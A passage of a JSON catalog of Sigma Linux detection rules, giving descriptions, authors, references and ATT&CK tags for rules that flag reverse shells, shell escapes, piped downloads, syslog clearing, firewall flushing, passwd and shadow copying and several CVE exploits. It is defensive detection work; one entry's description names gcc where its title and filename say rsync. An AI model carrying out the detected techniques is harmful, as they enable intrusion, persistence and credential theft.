"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "86157017-c2b1-4d4a-8c33-93b8e67e4af4", "value": "Potential Suspicious Change To Sensitive/Critical Files" }, { "description": "Detects execution of the bash shell with the interactive flag \"-i\".", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_bash_interactive_shell.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://linux.die.net/man/1/bash", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml" ], "tags": [ "attack.execution" ] }, "uuid": "6104e693-a7d6-4891-86cb-49a258523559", "value": "Bash Interactive Shell" }, { "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", "meta": { "author": "Daniil Yugoslavskiy, oscd.community", "creation_date": "2020-10-19", "falsepositive": [ "Legitimate activities" ], "filename": "proc_creation_lnx_base64_decode.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_decode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2072cab-8c9a-459b-b63c-40ae79e27031", "value": "Decode Base64 Encoded Text" }, { "description": "Detects enumeration of local network configuration", "meta": { "author": "Ömer Günal and remotephone, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_system_network_discovery.yml", "level": "informational", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_system_network_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1016" ] }, "related": [ { "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e7bd1cfa-b446-4c88-8afb-403bcd79e3fa", "value": "System Network Discovery - Linux" }, { "description": "Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_grep_os_arch_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d27ab432-2199-483f-a297-03633c05bae6", "value": "OS Architecture Discovery Via Grep" }, { "description": "Detects usage of the \"usermod\" binary to add users to the root or sudoers groups", "meta": { "author": "TuanLe (GTSC)", "creation_date": "2022-12-21", "falsepositive": [ "Legitimate administrator activities" ], "filename": "proc_creation_lnx_usermod_susp_group.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.configserverfirewall.com/ubuntu-linux/ubuntu-add-user-to-root-group/", 
"https://pberba.github.io/security/2021/11/23/linux-threat-hunting-for-persistence-account-creation-manipulation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_usermod_susp_group.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence" ] }, "uuid": "6a50f16c-3b7b-42d1-b081-0fdd3ba70a73", "value": "User Added To Root/Sudoers Group Using Usermod" }, { "description": "Detects the usage of the unsafe bpftrace option", "meta": { "author": "Andreas Hunkeler (@Karneades)", "creation_date": "2022-02-11", "falsepositive": [ "Legitimate usage of the unsafe option" ], "filename": "proc_creation_lnx_bpftrace_unsafe_option_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml" ], "tags": [ "attack.execution", "attack.t1059.004" ] }, "related": [ { "dest-uuid": "a9d4b653-6915-42af-98b2-5758c4ceee56", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8341cb2-ee25-43fa-a975-d8a5a9714b39", "value": "BPFtrace Unsafe Option Usage" }, { "description": "Detects usage of \"xterm\" as a potential reverse shell tunnel", "meta": { "author": "@d4ns4n_", "creation_date": "2023-04-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_xterm_reverse_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": 
"7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4e25af4b-246d-44ea-8563-e42aacab006b", "value": "Potential Xterm Reverse Shell" }, { "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", "meta": { "author": "Alejandro Ortuno, oscd.community", "creation_date": "2020-10-06", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_schedule_task_job_cron.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_schedule_task_job_cron.yml" ], "tags": [ "attack.execution", "attack.persistence", "attack.privilege-escalation", "attack.t1053.003" ] }, "related": [ { "dest-uuid": "2acf44aa-542f-4366-b4eb-55ef5747759c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6b14bac8-3e3a-4324-8109-42f0546a347f", "value": "Scheduled Cron Task/Job - Linux" }, { "description": "Detects usage of the \"touch\" process in service file.", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-11", "falsepositive": [ "Admin changing date of files." 
], "filename": "proc_creation_lnx_touch_susp.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31545105-3444-4584-bebf-c466353230d2", "value": "Touch Suspicious Service File" }, { "description": "Detects usage of the 'crontab' utility to remove the current crontab.\nThis is a common occurrence where cryptocurrency miners compete against each other by removing traces of other miners to hijack the maximum amount of resources possible\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_crontab_removal.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c2e234de-03a3-41e1-b39a-1e56dc17ba67", "value": "Remove Scheduled Cron Task/Job" }, { "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2022-26134", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-03", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml", "level": "high", "logsource.category": 
"process_creation", "logsource.product": "linux", "refs": [ "https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_26134_atlassian_confluence.yml" ], "tags": [ "attack.initial-access", "attack.execution", "attack.t1190", "attack.t1059", "cve.2022-26134" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7fb14105-530e-4e2e-8cfb-99f7d8700b66", "value": "Atlassian Confluence CVE-2022-26134" }, { "description": "Detects execution of inline Python code via the \"-c\" in order to call the \"system\" function from the \"os\" library, and spawn a shell.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_python_shell_os_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/python/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_shell_os_system.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2d2f44ff-4611-4778-a8fc-323a0e9850cc", "value": "Inline Python Execution - Spawn Shell Via OS System Library" }, { "description": "Detects execution of the \"esxcli\" command with the \"vm\" flag in order to retrieve information about the installed VMs.", "meta": { "author": "Cedric 
Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_vm_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1033", "attack.t1007" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5f1573a7-363b-4114-9208-ad7a61de46eb", "value": "ESXi VM List Discovery Via ESXCLI" }, { "description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-15", "falsepositive": [ "Scripts created by developers and admins", "Administrative activity" ], "filename": "proc_creation_lnx_curl_usage.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_curl_usage.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ea34fb97-e2c4-4afb-810f-785e4459b194", "value": "Curl Usage on Linux" }, { "description": "Detects changes to the ESXi syslog configuration via \"esxcli\"", "meta": { "author": "Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administrative activities" ], "filename": "proc_creation_lnx_esxcli_syslog_config_change.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_syslog_config_change.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001", "attack.t1562.003" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f504411-cb96-4dac-a537-8d2bb7679c59", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "38eb1dbb-011f-40b1-a126-cf03a0210563", "value": "ESXi Syslog Configuration Change Via ESXCLI" }, { "description": "Detects execution of shells from a parent process located in a temporary (/tmp) directory", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml", "level": "high", 
"logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml" ], "tags": [ "attack.execution" ] }, "uuid": "2fade0b6-7423-4835-9d4f-335b39b83867", "value": "Shell Execution Of Process Located In Tmp Directory" }, { "description": "Detects usage of the \"getcap\" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_capa_discovery.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/diego-treitos/linux-smart-enumeration", "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/carlospolop/PEASS-ng", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], "tags": [ "attack.discovery", "attack.t1083" ] }, "related": [ { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d8d97d51-122d-4cdd-9e2f-01b4b4933530", "value": "Capabilities Discovery - Linux" }, { "description": "Detects execution of the file \"execve_hijack\" which is used by the Triple Cross rootkit as a way to elevate privileges", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": 
"2022-07-05", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L275", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_triple_cross_rootkit_execve_hijack.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation" ] }, "uuid": "0326c3c8-7803-4a0f-8c5c-368f747f7c3e", "value": "Triple Cross eBPF Rootkit Execve Hijack" }, { "description": "Detects the use of wget to download content to a suspicious directory", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-06-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_wget_download_suspicious_directory.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cf610c15-ed71-46e1-bdf8-2bd1a99de6c4", "value": "Download File To Potentially Suspicious Directory Via Wget" }, { "description": "Detects the use of the \"ssh\" utility to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-08-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_ssh_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/ssh/", "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssh_shell_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8737b7f6-8df3-4bb7-b1da-06019b99b687", "value": "Shell Invocation Via Ssh - Linux" }, { "description": "Detects the use of the \"gcc\" utility to execute a shell. 
Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_rsync_shell_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/rsync/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_rsync_shell_execution.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e2326866-609f-4015-aea9-7ec634e8aa04", "value": "Shell Execution via Rsync - Linux" }, { "description": "Detects execution of the \"esxcli\" command with the \"vm\" and \"kill\" flag in order to kill/shutdown a specific VM.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Cedric Maurugeon", "creation_date": "2023-09-04", "falsepositive": [ "Legitimate administration activities" ], "filename": "proc_creation_lnx_esxcli_vm_kill.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml" ], "tags": [ "attack.execution" ] }, "uuid": 
"2992ac4d-31e9-4325-99f2-b18a73221bb2", "value": "ESXi VM Kill Via ESXCLI" }, { "description": "Detects attempts to exploit an Apache Spark server via CVE-2022-33891 from a commandline perspective", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-20", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", "https://github.com/apache/spark/pull/36315/files", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ "attack.initial-access", "attack.t1190", "cve.2022-33891" ] }, "related": [ { "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c8a5f584-cdc8-42cc-8cce-0398e4265de3", "value": "Apache Spark Shell Command Injection - ProcessCreation" }, { "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-10-15", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_lnx_sudo_cve_2019_14287.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.openwall.com/lists/oss-security/2019/10/14/1", "https://twitter.com/matthieugarin/status/1183970598210412546", "https://access.redhat.com/security/cve/cve-2019-14287", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_sudo_cve_2019_14287.yml" ], "tags": [ "attack.privilege-escalation", 
"attack.t1068", "attack.t1548.003", "cve.2019-14287" ] }, "related": [ { "dest-uuid": "b21c3b2d-02e6-45b1-980b-e69051040839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1365fe3b-0f50-455d-b4da-266ce31c23b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f74107df-b6c6-4e80-bf00-4170b658162b", "value": "Sudo Privilege Escalation CVE-2019-14287" }, { "description": "Detects the use of the \"capsh\" utility to invoke a shell.\n", "meta": { "author": "Li Ling, Andy Parkidomo, Robert Rakowski, Blake Hartstein (Bloomberg L.P.)", "creation_date": "2024-09-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_capsh_shell_invocation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://www.elastic.co/guide/en/security/current/linux-restricted-shell-breakout-via-linux-binary-s.html", "https://gtfobins.github.io/gtfobins/capsh/#shell", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capsh_shell_invocation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "db1ac3be-f606-4e3a-89e0-9607cbe6b98a", "value": "Capsh Shell Invocation - Linux" }, { "description": "Detect use of iptables to flush all firewall rules, tables and chains and allow all network traffic", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-18", "falsepositive": [ "Network administrators" ], "filename": "proc_creation_lnx_iptables_flush_ufw.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", 
"https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html", "https://blogs.blackberry.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.004" ] }, "related": [ { "dest-uuid": "5372c5fe-f424-4def-bcd5-d3a8e770f07b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3be619f4-d9ec-4ea8-a173-18fdd01996ab", "value": "Flush Iptables Ufw Chain" }, { "description": "Detects specific commands commonly used to remove or empty the syslog. Which is often used by attacker as a method to hide their tracks", "meta": { "author": "Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-10-15", "falsepositive": [ "Log rotation." ], "filename": "proc_creation_lnx_clear_syslog.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.002" ] }, "related": [ { "dest-uuid": "2bce5b30-7014-4a5d-ade7-12913fe6ac36", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3fcc9b35-39e4-44c0-a2ad-9e82b6902b31", "value": "Commands to Clear or Remove the Syslog" }, { "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "meta": { "author": "Muhammad Faisal", "creation_date": "2023-08-03", "falsepositive": [ "Legitimate activity of system administrators" ], "filename": "proc_creation_lnx_ssm_agent_abuse.yml", "level": "medium", "logsource.category": "process_creation", 
"logsource.product": "linux", "refs": [ "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml" ], "tags": [ "attack.command-and-control", "attack.persistence", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f9b3edc5-3322-4fc7-8aa3-245d646cc4b7", "value": "Potential Linux Amazon SSM Agent Hijacking" }, { "description": "Detects suspicious process command line that starts with a shell that executes something and finally gets piped into another shell", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-03-14", "falsepositive": [ "Legitimate software that uses these patterns" ], "filename": "proc_creation_lnx_susp_pipe_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_pipe_shell.yml" ], "tags": [ "attack.defense-evasion", "attack.t1140" ] }, "related": [ { "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "880973f3-9708-491c-a77b-2a35a1921158", "value": "Linux Shell Pipe to Shell" }, { "description": "Detects when the file \"passwd\" or \"shadow\" is copied from tmp path", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2023-01-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_lnx_cp_passwd_or_shadow_tmp.yml", 
